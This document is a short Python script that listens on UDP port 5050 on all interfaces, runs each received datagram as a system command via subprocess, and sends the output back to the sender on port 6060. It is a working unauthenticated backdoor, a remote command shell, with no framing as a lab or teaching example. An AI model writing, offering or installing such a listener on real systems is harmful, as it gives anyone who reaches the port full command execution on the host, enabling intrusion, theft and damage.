#!/usr/bin/python
import sys, socket, subprocess
try:
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	sock.bind(('0.0.0.0', 5050))
	while True:
		command = sock.recvfrom(4096)
		#print(command)
		if not command:
			continue
		try:
			ipTuple = command[1]
			ip = ipTuple[0]
			#print(ip)
			output = subprocess.check_output(command[0].split())
			sock.sendto(str(output), (ip, 6060))
		except OSError:
			print('That cannot be done')
except KeyboardInterrupt:
	print('KeyboardInterrupt')
